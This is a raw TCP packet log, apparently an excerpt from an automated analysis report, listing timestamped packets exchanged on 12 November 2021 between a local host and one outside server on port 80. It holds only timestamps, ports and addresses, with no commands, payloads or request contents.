                          Nov 12, 2021 22:24:05.464660883 CET5004580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.466169119 CET5004580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.488742113 CET8050045178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.488791943 CET8050045178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.488873005 CET8050045178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.488905907 CET5004580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.488935947 CET5004580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.603704929 CET5004580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.605171919 CET5004680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.626333952 CET8050045178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.626477957 CET5004580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.627589941 CET8050046178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.627710104 CET5004680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.636332989 CET5004680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.658776045 CET8050046178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.658807039 CET8050046178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.658819914 CET8050046178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.658926964 CET5004680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.658957005 CET5004680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.769805908 CET5004680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.771487951 CET5004880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.793147087 CET8050046178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.793303013 CET5004680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.793793917 CET8050048178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.793919086 CET5004880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.809629917 CET5004880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.820244074 CET5004980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.833312035 CET8050048178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.833409071 CET8050048178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.833414078 CET8050048178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.833515882 CET5004880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.843233109 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.843364954 CET5004980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.844512939 CET5004980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.844644070 CET5004980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.844856977 CET5004980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.844961882 CET5004980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.867001057 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.867038012 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.867204905 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.867223978 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.867239952 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.867264032 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.867280006 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.867311954 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.867321968 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.867327929 CET5004980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.867331982 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.867364883 CET5004980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.867376089 CET5004980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.867423058 CET5004980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.867424965 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.867435932 CET5004980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.867440939 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.867482901 CET5004980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.867538929 CET5004980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.890136957 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.890165091 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.890172958 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.890185118 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.890197039 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.890208960 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.890222073 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.890232086 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.890259981 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.890336990 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.890439987 CET5004980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.890459061 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.890474081 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.890482903 CET5004980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.890486956 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.890499115 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.890502930 CET5004980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.890506029 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.890516043 CET5004980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.890517950 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.890526056 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.890537024 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.890543938 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.890552998 CET5004980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.890611887 CET5004980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.890669107 CET5004980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.912960052 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.912986040 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913007021 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913019896 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913034916 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913047075 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913058996 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913073063 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913084030 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913094997 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913108110 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913120031 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913131952 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913144112 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913155079 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913167000 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913177967 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913177013 CET5004980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.913189888 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913203955 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913212061 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913223982 CET5004980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:05.913266897 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913280010 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913290977 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913302898 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913315058 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913326025 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913338900 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913352013 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913362980 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913373947 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913387060 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913398027 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913409948 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913422108 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913434982 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913466930 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913932085 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.913969994 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.935585022 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.935692072 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.935708046 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.935719967 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.935731888 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.935760975 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.935772896 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.935784101 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.935796022 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.935807943 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.935882092 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.935894966 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.935906887 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.939395905 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:05.939578056 CET5004980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:06.070839882 CET5004980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:06.098948002 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:06.099071980 CET5004980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:06.711543083 CET5004980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:06.711951017 CET5004880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:06.713663101 CET5005180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:06.734236956 CET8050049178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:06.734266043 CET8050048178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:06.734352112 CET5004980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:06.734376907 CET5004880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:06.736202955 CET8050051178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:06.736583948 CET5005180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:06.738065958 CET5005180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:06.760500908 CET8050051178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:06.760540009 CET8050051178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:06.760556936 CET8050051178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:06.760642052 CET5005180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:06.887808084 CET5005180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:06.889419079 CET5005280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:06.910715103 CET8050051178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:06.910960913 CET5005180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:06.912199020 CET8050052178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:06.912878990 CET5005280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:06.915276051 CET5005280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:06.937798023 CET8050052178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:06.937825918 CET8050052178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:06.937835932 CET8050052178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:06.937946081 CET5005280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:07.052577972 CET5005280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:07.053764105 CET5005480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:07.074925900 CET8050052178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:07.075187922 CET5005280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:07.076406956 CET8050054178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:07.076617956 CET5005480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:07.077225924 CET5005480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:07.100430965 CET8050054178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:07.102319956 CET8050054178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:07.102334023 CET8050054178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:07.102406979 CET5005480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:07.213721037 CET5005480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:07.214904070 CET5005580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:07.236994028 CET8050054178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:07.237118959 CET5005480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:07.237802029 CET8050055178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:07.237929106 CET5005580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:07.366317034 CET5005580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:07.388843060 CET8050055178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:07.388889074 CET8050055178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:07.388905048 CET8050055178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:07.389075994 CET5005580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:08.645698071 CET5005580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:08.647447109 CET5005680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:08.668190002 CET8050055178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:08.668406963 CET5005580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:08.669759989 CET8050056178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:08.669953108 CET5005680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:08.699569941 CET5005680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:08.721992016 CET8050056178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:08.725644112 CET8050056178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:08.841877937 CET5005680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.024667978 CET5005680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.026310921 CET5005780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.047168970 CET8050056178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.047296047 CET5005680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.048604012 CET8050057178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.048897028 CET5005780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.057308912 CET5005780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.079770088 CET8050057178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.079835892 CET8050057178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.079843998 CET8050057178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.079992056 CET5005780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.195252895 CET5005780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.197053909 CET5005980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.217705011 CET8050057178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.217839003 CET5005780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.219357967 CET8050059178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.219468117 CET5005980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.220449924 CET5005980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.242676973 CET8050059178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.246651888 CET8050059178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.246835947 CET5005980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.351783991 CET5005980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.353614092 CET5006080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.363888979 CET5006180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.374109983 CET8050059178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.374202967 CET5005980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.376180887 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.376296043 CET5006080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.377106905 CET5006080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.377274990 CET5006080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.377520084 CET5006080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.377737999 CET5006080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.386230946 CET8050061178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.386406898 CET5006180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.388570070 CET5006180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.399645090 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.399730921 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.400258064 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.400273085 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.400326014 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.400342941 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.400348902 CET5006080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.400357008 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.400372982 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.400388002 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.400393963 CET5006080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.400403023 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.400419950 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.400427103 CET5006080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.400460958 CET5006080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.400469065 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.400511026 CET5006080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.400532961 CET5006080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.411530018 CET8050061178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.415051937 CET8050061178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.415164948 CET5006180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.422897100 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.422916889 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.422929049 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.422949076 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.422957897 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.422982931 CET5006080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.423065901 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.423080921 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.423110962 CET5006080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.423145056 CET5006080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.423202038 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.423218966 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.423233986 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.423249006 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.423258066 CET5006080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.423264980 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.423280001 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.423295975 CET5006080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.423336983 CET5006080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.423590899 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.423609972 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.423625946 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.423648119 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.423662901 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.423679113 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.423749924 CET5006080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.423785925 CET5006080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.423791885 CET5006080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.445683002 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.445708036 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.445763111 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.445777893 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.445821047 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.445837975 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.445852995 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.445858002 CET5006080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.445871115 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.445887089 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.445904016 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.445923090 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.445930958 CET5006080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.445938110 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.445954084 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.445971966 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.445986986 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.446002960 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.446192026 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.446208954 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.446252108 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.446268082 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.446283102 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.446299076 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.446314096 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.446355104 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.446368933 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.446583986 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.446624041 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.446640968 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.446659088 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.446672916 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.446690083 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.446706057 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.446719885 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.446734905 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.446748972 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.446765900 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.446783066 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.446795940 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.469374895 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.469392061 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.469407082 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.469420910 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.469435930 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.469451904 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.470472097 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.470488071 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.470501900 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.470519066 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.470534086 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.470549107 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.470563889 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.472786903 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.472903967 CET5006080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.522130966 CET5006080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.522612095 CET5006180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.523852110 CET5006380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.544883966 CET8050060178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.544935942 CET8050061178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.544982910 CET5006080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.545079947 CET5006180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.546423912 CET8050063178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.546540022 CET5006380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.547374964 CET5006380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.571237087 CET8050063178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.577625990 CET8050063178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.577749014 CET5006380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.690998077 CET5006380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.693309069 CET5006480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.714709997 CET8050063178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.714795113 CET5006380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.715626955 CET8050064178.208.83.45192.168.2.4
                          Nov 12, 2021 22:24:09.715742111 CET5006480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.716557980 CET5006480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:24:09.739084959 CET8050064178.208.83.45192.168.2.4
